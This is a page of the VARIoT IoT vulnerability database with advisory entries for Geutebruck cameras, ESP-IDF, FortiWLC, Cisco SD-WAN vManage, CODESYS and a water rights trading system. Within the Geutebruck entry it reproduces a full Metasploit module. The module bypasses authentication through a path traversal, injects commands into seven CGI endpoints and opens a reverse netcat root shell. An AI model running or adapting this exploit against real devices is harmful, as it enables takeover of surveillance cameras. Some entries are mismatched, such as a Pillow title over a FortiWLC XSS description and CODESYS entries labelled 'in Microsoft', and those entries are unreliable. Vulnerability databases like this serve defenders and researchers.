VARIoT IoT vulnerabilities database

VAR-202109-0598 CVE-2021-33545 Multiple vulnerabilities in GEUTEBRUCK G-Cam E2 and G-Code
CVSS V2: 6.5
CVSS V3: 7.2
Severity: HIGH
Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the counter parameter which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK's G-Cam E2 and G-Code contain the following multiple vulnerabilities.
* Lack of authentication for important features (CWE-306) - CVE-2021-33543
* Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
* Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549
The expected impact depends on each vulnerability, but it may be affected as follows.
VAR-202109-0597 CVE-2021-33544 Multiple vulnerabilities in GEUTEBRUCK G-Cam E2 and G-Code
CVSS V2: 6.5
CVSS V3: 7.2
Severity: HIGH
Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK's G-Cam E2 and G-Code contain the following multiple vulnerabilities.
* Lack of authentication for important features (CWE-306) - CVE-2021-33543
* Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
* Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549
The expected impact depends on each vulnerability, but it may be affected as follows.
* Confidential information is stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543
* Arbitrary code is executed through command injection by a remote third party - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
* A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545
* A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546
* A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547
* A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Geutebruck Multiple Remote Command Execution',
        'Description' => %q{
          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder
          and exploits multiple authenticated arbitrary command execution vulnerabilities within
          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx,
          ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware
          versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution
          as the root user.
        },
        'Author' => [
          'Titouan Lazard', # Of RandoriSec - Discovery
          'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
          'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2021-33543'],
          ['CVE', '2021-33544'],
          ['CVE', '2021-33548'],
          ['CVE', '2021-33550'],
          ['CVE', '2021-33551'],
          ['CVE', '2021-33552'],
          ['CVE', '2021-33553'],
          ['CVE', '2021-33554'],
          [ 'URL', 'http://geutebruck.com' ],
          [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
          [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
        ],
        'DisclosureDate' => '2021-07-08',
        'Privileged' => true,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [
            'CVE-2021-33544 - certmngr.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'createselfcert',
                'local' => Rex::Text.rand_text_alphanumeric(10..16),
                'country' => Rex::Text.rand_text_alphanumeric(2),
                'state' => '$(PLACEHOLDER_CMD)',
                'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                'days' => Rex::Text.rand_text_numeric(2..4),
                'type' => Rex::Text.rand_text_numeric(2..4)
              },
              'uri' => '/../uapi-cgi/certmngr.cgi'
            }
          ],
          [
            'CVE-2021-33548 - factory.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/factory.cgi'
            }
          ],
          [
            'CVE-2021-33550 - language.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/language.cgi'
            }
          ],
          [
            'CVE-2021-33551 - oem.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'set',
                'enable' => 'yes',
                'environment.lang' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/oem.cgi'
            }
          ],
          [
            'CVE-2021-33552 - simple_reclistjs.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'get',
                'timekey' => Rex::Text.rand_text_numeric(2..4),
                'date' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
            }
          ],
          [
            'CVE-2021-33553 - testcmd.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
              'uri' => '/../uapi-cgi/testcmd.cgi'
            }
          ],
          [
            'CVE-2021-33554 - tmpapp.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/tmpapp.cgi'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        },
        'Notes' => {
          'Stability' => ['CRASH_SAFE'],
          'Reliability' => ['REPEATABLE_SESSION'],
          'SideEffects' => ['ARTIFACTS_ON_DISK']
        }
      )
    )
  end

  def firmware
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/brand.xml'
    )
    unless res
      print_error('Connection failed!')
      return false
    end

    unless res&.body && !res.body.empty?
      print_error('Empty body in the response!')
      return false
    end

    res_xml = res.get_xml_document
    if res_xml.at('//firmware').nil?
      print_error('Target did not respond with a XML document containing the "firmware" element!')
      return false
    end
    raw_text = res_xml.at('//firmware').text
    if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
      raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
    else
      print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
      false
    end
  end

  def check
    version = firmware
    if version == false
      return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!')
    end

    rex_version = Rex::Version.new(version)
    vprint_status("Found Geutebruck version #{rex_version}")
    if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  def exploit
    print_status("#{rhost}:#{rport} - Setting up request...")

    method = target['http_method']
    if method == 'GET'
      http_method_vars = 'vars_get'
    else
      http_method_vars = 'vars_post'
    end

    http_vars = target['http_vars']
    http_vars.each do |(k, v)|
      if v.include? 'PLACEHOLDER_CMD'
        http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
      end
    end

    print_status("Sending CMD injection request to #{rhost}:#{rport}")
    send_request_cgi(
      {
        'method' => method,
        'uri' => target['uri'],
        http_method_vars => http_vars
      }
    )
    print_status('Exploit complete, you should get a shell as the root user!')
  end
end
VAR-202109-0596 CVE-2021-33543 Multiple vulnerabilities in GEUTEBRUCK G-Cam E2 and G-Code
CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
Multiple camera devices by UDP Technology, Geutebrück and other vendors allow unauthenticated remote access to sensitive files due to default user authentication settings. This can lead to manipulation of the device and denial of service. GEUTEBRUCK's G-Cam E2 and G-Code contain the following multiple vulnerabilities.
* Lack of authentication for important features (CWE-306) - CVE-2021-33543
* Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
* Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549
The expected impact depends on each vulnerability, but it may be affected as follows.
* Confidential information is stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543
* Arbitrary code is executed through command injection by a remote third party - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
* A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545
* A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546
* A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547
* A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549
VAR-202109-0564 CVE-2021-28136 Out-of-bounds write vulnerability in Espressif ESP-IDF
CVSS V2: 3.3
CVSS V3: 6.5
Severity: MEDIUM
The Bluetooth Classic implementation in Espressif ESP-IDF 4.4 and earlier does not properly handle the reception of multiple LMP IO Capability Request packets during the pairing process, allowing attackers in radio range to trigger memory corruption (and consequently a crash) in ESP32 via a replayed (duplicated) LMP packet. Espressif ESP-IDF contains an out-of-bounds write vulnerability. Service operation may be interrupted (DoS). Espressif ESP-IDF is a development framework for the Internet of Things developed by Espressif. There is a buffer error vulnerability in Espressif ESP-IDF, which originates from the Bluetooth Classic implementation in Espressif ESP-IDF 4.4 and earlier versions.
VAR-202106-1945 CVE-2021-26087 Pillow Buffer error vulnerability
CVSS V2: -
CVSS V3: 4.3
Severity: MEDIUM
An improper neutralization of input during web page generation in FortiWLC version 8.6.0, version 8.5.3 and below, version 8.4.8 and below, version 8.3.3 web interface may allow both authenticated remote attackers and non-authenticated attackers in the same network as the appliance to perform a stored cross site scripting attack (XSS) via injecting malicious payloads in different locations. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
VAR-202106-1941 CVE-2021-32584 Access control vulnerabilities in Fortinet's FortiWLC
CVSS V2: -
CVSS V3: 5.3
Severity: MEDIUM
An improper access control (CWE-284) vulnerability in FortiWLC version 8.6.0, version 8.5.3 and below, version 8.4.8 and below, version 8.3.3 and below, version 8.2.7 to 8.2.4, version 8.1.3 may allow an unauthenticated and remote attacker to access certain areas of the web management CGI functionality by just specifying the correct URL. The vulnerability applies only to limited CGI resources and might allow the unauthorized party to access configuration details. Fortinet's FortiWLC contains an access control vulnerability. Information may be obtained.
VAR-202105-1518 CVE-2021-22126 Access control vulnerabilities in Fortinet's FortiWLC
CVSS V2: -
CVSS V3: 6.7
Severity: MEDIUM
A use of hard-coded password vulnerability in FortiWLC version 8.5.2 and below, version 8.4.8 and below, version 8.3.3 to 8.3.2, version 8.2.7 to 8.2.6 may allow a local, authenticated attacker to connect to the managed Access Point (Meru AP and FortiAP-U) as root using the default hard-coded username and password. Fortinet's FortiWLC contains vulnerabilities related to access control and the use of hard-coded credentials. Information may be obtained, information may be tampered with, and service operation may be interrupted (DoS).
VAR-202105-1517 CVE-2021-1234 Cisco Systems Cisco Catalyst SD-WAN Manager Vulnerability related to leakage of important information to unauthorized control areas
CVSS V2: -
CVSS V3: 5.3
Severity: MEDIUM
A vulnerability in the cluster management interface of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to view sensitive information on an affected system. To be affected by this vulnerability, the vManage software must be in cluster mode. This vulnerability is due to the absence of authentication for sensitive information in the cluster management interface. An attacker could exploit this vulnerability by sending a crafted request to the cluster management interface of an affected system. A successful exploit could allow the attacker to view sensitive information on the affected system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Cisco Systems Cisco Catalyst SD-WAN Manager contains a vulnerability that allows sensitive information to be leaked to unauthorized control areas. Information may be obtained. This advisory is available at the following link: tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-vmaninfdis3-OvdR6uu8
VAR-202104-1953 CVE-2021-1482 Input verification vulnerability in Cisco Systems Cisco Catalyst SD-WAN Manager
CVSS V2: -
CVSS V3: 6.4
Severity: MEDIUM
A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to bypass authorization checking and gain access to sensitive information on an affected system. This vulnerability is due to insufficient authorization checks. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to bypass authorization checking and gain access to sensitive information on the affected system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Cisco Systems Cisco Catalyst SD-WAN Manager contains an input validation vulnerability. Information may be obtained and information may be tampered with. This advisory is available at the following link: tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-auth-bypass-Z3Zze5XC
VAR-202104-1952 CVE-2021-1481 Cisco Systems Cisco Catalyst SD-WAN Manager Vulnerability related to improper neutralization of special elements in data query logic
CVSS V2: -
CVSS V3: 4.3
Severity: MEDIUM
A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct Cypher query language injection attacks on an affected system. This vulnerability is due to insufficient input validation by the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to the interface of an affected system. A successful exploit could allow the attacker to obtain sensitive information. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Cisco Systems Cisco Catalyst SD-WAN Manager contains a vulnerability related to improper neutralization of special elements in the data query logic. Information may be obtained. This advisory is available at the following link: tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-cql-inject-c7z9QqyB
VAR-202104-1951 CVE-2021-1483 XML external entity vulnerabilities in Cisco Systems Cisco Catalyst SD-WAN Manager
CVSS V2: -
CVSS V3: 6.4
Severity: MEDIUM
A vulnerability in the web UI of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to gain read and write access to information that is stored on an affected system. This vulnerability is due to improper handling of XML External Entity (XXE) entries when the affected software parses certain XML files. An attacker could exploit this vulnerability by persuading a user to import a crafted XML file with malicious entries. A successful exploit could allow the attacker to read and write files within the affected application. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Cisco Systems Cisco Catalyst SD-WAN Manager contains an XML external entity vulnerability. Information may be obtained and information may be tampered with. This advisory is available at the following link: tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-xml-ext-entity-q6Z7uVUg
VAR-202104-1950 CVE-2021-1484 Vulnerability in inserting or changing arguments in Cisco Systems Cisco Catalyst SD-WAN Manager
CVSS V2: -
CVSS V3: 6.5
Severity: MEDIUM
A vulnerability in the web UI of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to inject arbitrary commands on an affected system and cause a denial of service (DoS) condition. This vulnerability is due to improper input validation of user-supplied input to the device template configuration. An attacker could exploit this vulnerability by submitting crafted input to the device template configuration. A successful exploit could allow the attacker to cause a DoS condition on the affected system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Cisco Systems Cisco Catalyst SD-WAN Manager contains a vulnerability in inserting or modifying arguments. Service operation may be interrupted (DoS). This advisory is available at the following link: tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-cmdinj-nRHKgfHX
VAR-202104-1949 CVE-2021-1491 Link interpretation vulnerability in Cisco Systems Cisco Catalyst SD-WAN Manager
CVSS V2: -
CVSS V3: 6.5
Severity: MEDIUM
A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to read arbitrary files on the underlying file system of the device. This vulnerability is due to insufficient file scope limiting. An attacker could exploit this vulnerability by creating a specific file reference on the file system and then accessing it through the web-based management interface. A successful exploit could allow the attacker to read arbitrary files from the file system of the underlying operating system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Cisco Systems Cisco Catalyst SD-WAN Manager contains a link interpretation vulnerability. Information may be obtained. This advisory is available at the following link: tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-info-disclos-gGvm9Mfu
VAR-202105-0852 CVE-2021-30192 CODESYS V2 Web-Server Authentication Vulnerability in Microsoft
CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
CODESYS V2 Web-Server before 1.1.9.20 has an Improperly Implemented Security Check. CODESYS V2 Web-Server contains an improper authentication vulnerability. Information may be obtained, information may be tampered with, and service may be disrupted (DoS).
VAR-202105-0850 CVE-2021-30190 Vulnerability regarding lack of authentication for critical features in CODESYS V2 Web-Server
CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
CODESYS V2 Web-Server before 1.1.9.20 has Improper Access Control. CODESYS V2 Web-Server contains a vulnerability regarding the lack of authentication for critical features. Information may be obtained, information may be tampered with, and service operation may be interrupted (DoS).
VAR-202105-0849 CVE-2021-30189 CODESYS V2 Web-Server Out-of-bounds Vulnerability in Microsoft
CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
CODESYS V2 Web-Server before 1.1.9.20 has a Stack-based Buffer Overflow. CODESYS V2 Web-Server is vulnerable to an out-of-bounds write. Information may be obtained, information may be tampered with, and service may be disrupted (DoS).
VAR-202104-2055 No CVE SQL injection vulnerability exists in the water rights trading system (CNVD-2021-18287)
CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Tangshan Liulin Automation Equipment Co., Ltd. is a high-tech enterprise specializing in the research and development, production, sales and system engineering technical services of the security communication terminal and smart application platform software of the Internet of Things. There is a SQL injection vulnerability in the water rights trading system. Attackers can use the vulnerability to obtain sensitive information in the database.
VAR-202104-2056 No CVE SQL injection vulnerability exists in the water rights trading system (CNVD-2021-18285)
CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Tangshan Liulin Automation Equipment Co., Ltd. is a high-tech enterprise specializing in the research and development, production, sales and system engineering technical services of the security communication terminal and smart application platform software of the Internet of Things. There is a SQL injection vulnerability in the water rights trading system. Attackers can use the vulnerability to obtain sensitive information in the database.
VAR-202104-2057 No CVE SQL injection vulnerability exists in the water rights trading system (CNVD-2021-18286)
CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Tangshan Liulin Automation Equipment Co., Ltd. is a high-tech enterprise specializing in the research and development, production, sales and system engineering technical services of the security communication terminal and smart application platform software of the Internet of Things. There is a SQL injection vulnerability in the water rights trading system. Attackers can use the vulnerability to obtain sensitive information in the database.
VAR-202104-2058 No CVE SQL injection vulnerability exists in the water rights trading system (CNVD-2021-18288)
CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Tangshan Liulin Automation Equipment Co., Ltd. is a high-tech enterprise specializing in the research and development, production, sales and system engineering technical services of the security communication terminal and smart application platform software of the Internet of Things. There is a SQL injection vulnerability in the water rights trading system. Attackers can use the vulnerability to obtain sensitive information in the database.